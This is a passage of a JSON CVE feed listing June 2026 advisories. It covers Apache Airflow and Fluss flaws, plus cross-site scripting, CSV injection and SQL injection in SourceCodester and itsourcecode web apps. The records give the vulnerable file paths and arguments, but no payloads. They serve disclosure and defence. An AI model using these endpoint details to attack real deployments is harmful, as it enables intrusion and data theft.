the worker's trust boundary) could present a self-signed certificate, have the worker complete the STARTTLS handshake silently, and capture the SMTP AUTH credentials and message contents the worker forwarded.\n\nThis CVE covers the **core apache-airflow side** of the same root cause already covered for the SMTP provider by `CVE-2026-41016` (published 2026-04-27, covering `apache-airflow-providers-smtp`). Users who already applied the SMTP-provider fix from CVE-2026-41016 should additionally upgrade `apache-airflow` to 3.2.2 or later to cover the core-side path through `airflow.utils.email`. 
Affects deployments configured with `smtp_starttls=True` and `smtp_ssl=False` where the SMTP relay is reachable across a less-trusted network segment than the worker.\n\nUsers are advised to upgrade to `apache-airflow` 3.2.2 or later."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Primary","description":[{"lang":"en","value":"CWE-295"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/65346","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/6v2ds757000msmjmovnnqryqzks83ps0","source":"security@apache.org"}]}},{"cve":{"id":"CVE-2026-49298","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:20.770","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"A bug in Apache Airflow's KubernetesExecutor caused JWT tokens used by worker pods to authenticate against the Execution API to be passed to the worker container as command-line arguments visible in the pod spec. An authenticated UI/API user with Kubernetes read-only access to the cluster (e.g. `pods/get` in the Airflow namespace) could harvest the JWT from `kubectl describe pod` output and then call state-mutating Execution API endpoints — triggering Dag runs, clearing runs, reading or writing Variables / Connections / XComs — as if they were a running task. Affects deployments using the `KubernetesExecutor`. Users are advised to upgrade to `apache-airflow` 3.2.2 or later. This is the airflow-core half of the same vulnerability addressed by [CVE-2026-27173](https://www.cve.org/CVERecord?id=CVE-2026-27173), which shipped the apache-airflow-providers-cncf-kubernetes side of the fix. 
Deployments that already upgraded `apache-airflow-providers-cncf-kubernetes` to 10.17.0 or later per the CVE-2026-27173 advisory should additionally upgrade `apache-airflow` to 3.2.2 or later to close the core-side surface — the two fixes are complementary, not duplicates."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Primary","description":[{"lang":"en","value":"CWE-538"}]}],"references":[{"url":"https://github.com/apache/airflow/pull/60108","source":"security@apache.org"},{"url":"https://lists.apache.org/thread/wo09vrks8189dzsot39rvrx3vnx102tt","source":"security@apache.org"}]}},{"cve":{"id":"CVE-2026-49361","sourceIdentifier":"security@apache.org","published":"2026-06-01T09:16:20.880","lastModified":"2026-06-01T13:13:55.560","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Apache Fluss versions prior to 0.9.1 configure the Netty LengthFieldBasedFrameDecoder with Integer.MAX_VALUE as the maximum frame length, allowing unauthenticated remote attackers to exhaust JVM heap memory on TabletServer and CoordinatorServer by sending specially crafted frame headers, resulting in denial of service.\n\nThis issue affects Apache Fluss (incubating): 0.8.0 and 0.9.0.\n\nUsers are recommended to upgrade to version 0.9.1, which fixes the issue."}],"metrics":{},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-400"},{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://lists.apache.org/thread/dccw6tj0njwtmvbftq13mw7fdhsok373","source":"security@apache.org"},{"url":"http://www.openwall.com/lists/oss-security/2026/05/30/5","source":"af854a3a-2127-422b-91ae-364da2661108"}]}},{"cve":{"id":"CVE-2026-10244","sourceIdentifier":"cna@vuldb.com","published":"2026-06-01T11:16:23.340","lastModified":"2026-06-01T13:14:43.470","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A vulnerability was detected in SourceCodester Pharmacy Sales and 
Inventory System 1.0. Affected by this vulnerability is the function create_medicine_name of the file /ShowForm/create_medicine_name/main. Performing a manipulation of the argument medicine_name results in cross site scripting. The attack can be initiated remotely. The exploit is now public and may be used."}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.0,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"PASSIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N","baseScore":3.5,"baseSeverity":"LOW","attackVector":"NETWORK","
attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.1,"impactScore":1.4}],"cvssMetricV2":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:S/C:N/I:P/A:N","baseScore":4.0,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"SINGLE","confidentialityImpact":"NONE","integrityImpact":"PARTIAL","availabilityImpact":"NONE"},"baseSeverity":"MEDIUM","exploitabilityScore":8.0,"impactScore":2.9,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"},{"lang":"en","value":"CWE-94"}]}],"references":[{"url":"https://github.com/timeflies123/cve/issues/2","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-10244","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/823931","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367522","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367522/cti","source":"cna@vuldb.com"},{"url":"https://www.sourcecodester.com/","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-10245","sourceIdentifier":"cna@vuldb.com","published":"2026-06-01T11:16:23.603","lastModified":"2026-06-01T13:14:43.470","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A flaw has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. Affected by this issue is the function create_supplier of the file /ShowForm/create_supplier/main. Executing a manipulation of the argument company_name can lead to cross site scripting. The attack can be launched remotely. 
The exploit has been published and may be used."}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.0,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"PASSIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N","baseScore":3.5,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.1,"impactScore":1.4}],"cvssMetricV2":[{"source":"cna@
vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:S/C:N/I:P/A:N","baseScore":4.0,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"SINGLE","confidentialityImpact":"NONE","integrityImpact":"PARTIAL","availabilityImpact":"NONE"},"baseSeverity":"MEDIUM","exploitabilityScore":8.0,"impactScore":2.9,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"},{"lang":"en","value":"CWE-94"}]}],"references":[{"url":"https://github.com/timeflies123/cve/issues/3","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-10245","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/823937","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367523","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367523/cti","source":"cna@vuldb.com"},{"url":"https://www.sourcecodester.com/","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-10246","sourceIdentifier":"cna@vuldb.com","published":"2026-06-01T11:16:23.773","lastModified":"2026-06-01T13:14:43.470","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A vulnerability has been found in SourceCodester Pharmacy Sales and Inventory System 1.0. This affects the function create_medicine_presentation of the file /ShowForm/create_medicine_presentation/main. The manipulation of the argument medicine_presentation leads to cross site scripting. The attack may be initiated remotely. 
The exploit has been disclosed to the public and may be used."}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.0,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"PASSIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N","baseScore":3.5,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.1,"impactScore":1.4}],"cvssMetricV2":[{
"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:S/C:N/I:P/A:N","baseScore":4.0,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"SINGLE","confidentialityImpact":"NONE","integrityImpact":"PARTIAL","availabilityImpact":"NONE"},"baseSeverity":"MEDIUM","exploitabilityScore":8.0,"impactScore":2.9,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"},{"lang":"en","value":"CWE-94"}]}],"references":[{"url":"https://github.com/timeflies123/cve/issues/4","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-10246","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/823941","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367524","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367524/cti","source":"cna@vuldb.com"},{"url":"https://www.sourcecodester.com/","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-10247","sourceIdentifier":"cna@vuldb.com","published":"2026-06-01T11:16:23.930","lastModified":"2026-06-01T13:14:43.470","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A vulnerability was found in SourceCodester Pharmacy Sales and Inventory System 1.0. This vulnerability affects the function create_generic_name of the file /ShowForm/create_generic_name/main. The manipulation of the argument generic_name results in cross site scripting. The attack may be launched remotely. 
The exploit has been made public and could be used."}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.0,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"PASSIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N","baseScore":3.5,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.1,"impactScore":1.4}],"cvssMetricV2":[{"source":"
cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:S/C:N/I:P/A:N","baseScore":4.0,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"SINGLE","confidentialityImpact":"NONE","integrityImpact":"PARTIAL","availabilityImpact":"NONE"},"baseSeverity":"MEDIUM","exploitabilityScore":8.0,"impactScore":2.9,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"},{"lang":"en","value":"CWE-94"}]}],"references":[{"url":"https://github.com/timeflies123/cve/issues/5","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-10247","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/823943","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367525","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367525/cti","source":"cna@vuldb.com"},{"url":"https://www.sourcecodester.com/","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-10248","sourceIdentifier":"cna@vuldb.com","published":"2026-06-01T11:16:24.090","lastModified":"2026-06-01T13:14:43.470","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A vulnerability was determined in SourceCodester Pharmacy Sales and Inventory System up to 1.0. This issue affects the function create_supplier of the file /Export_csv/export of the component Supplier Creation Interface. This manipulation of the argument Address/Company Name causes csv injection. Remote exploitation of the attack is possible. 
The exploit has been publicly disclosed and may be utilized."}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":2.0,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"HIGH","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L","baseScore":4.7,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"HIGH","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":1.2,"impactScore":3.4}],"cvssMetricV2":[{"source
":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:M/C:P/I:P/A:P","baseScore":5.8,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"MULTIPLE","confidentialityImpact":"PARTIAL","integrityImpact":"PARTIAL","availabilityImpact":"PARTIAL"},"baseSeverity":"MEDIUM","exploitabilityScore":6.4,"impactScore":6.4,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-74"},{"lang":"en","value":"CWE-1236"}]}],"references":[{"url":"https://github.com/timeflies123/cve/issues/6","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-10248","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/824029","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367526","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367526/cti","source":"cna@vuldb.com"},{"url":"https://www.sourcecodester.com/","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-10249","sourceIdentifier":"cna@vuldb.com","published":"2026-06-01T11:16:24.260","lastModified":"2026-06-01T13:14:43.470","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A vulnerability was identified in itsourcecode Online Blood Bank Management System 1.0. Impacted is an unknown function of the file /admin/viewrequest.php. Such manipulation of the argument ID leads to sql injection. The attack can be executed remotely. 
The exploit is publicly available and might be used."}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","baseScore":7.3,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":3.4}],"cvssMetricV2":[{"source":"cna@
vuldb.com","type":"Secondary","cvssData":{"version":"2.0","vectorString":"AV:N/AC:L/Au:N/C:P/I:P/A:P","baseScore":7.5,"accessVector":"NETWORK","accessComplexity":"LOW","authentication":"NONE","confidentialityImpact":"PARTIAL","integrityImpact":"PARTIAL","availabilityImpact":"PARTIAL"},"baseSeverity":"HIGH","exploitabilityScore":10.0,"impactScore":6.4,"acInsufInfo":false,"obtainAllPrivilege":false,"obtainUserPrivilege":false,"obtainOtherPrivilege":false,"userInteractionRequired":false}]},"weaknesses":[{"source":"cna@vuldb.com","type":"Primary","description":[{"lang":"en","value":"CWE-74"},{"lang":"en","value":"CWE-89"}]}],"references":[{"url":"https://github.com/zhengdexu-bot/zhengdexu/issues/1","source":"cna@vuldb.com"},{"url":"https://itsourcecode.com/","source":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-10249","source":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/824023","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367527","source":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/367527/cti","source":"cna@vuldb.com"}]}},{"cve":{"id":"CVE-2026-10250","sourceIdentifier":"cna@vuldb.com","published":"2026-06-01T11:16:24.420","lastModified":"2026-06-01T13:14:43.470","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"A security flaw has been discovered in itsourcecode Online Blood Bank Management System 1.0. The affected element is an unknown function of the file /admin/campsdetails.php. Performing a manipulation of the argument hospital results in sql injection. The attack is possible to be carried out remotely. 
The exploit has been released to the public and may be used for attacks."}],"metrics":{"cvssMetricV40":[{"source":"cna@vuldb.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"LOW","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"PROOF_OF_CONCEPT","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"cna@vuldb.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L","baseScore":7.3,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":3.4}],"cvssMetric
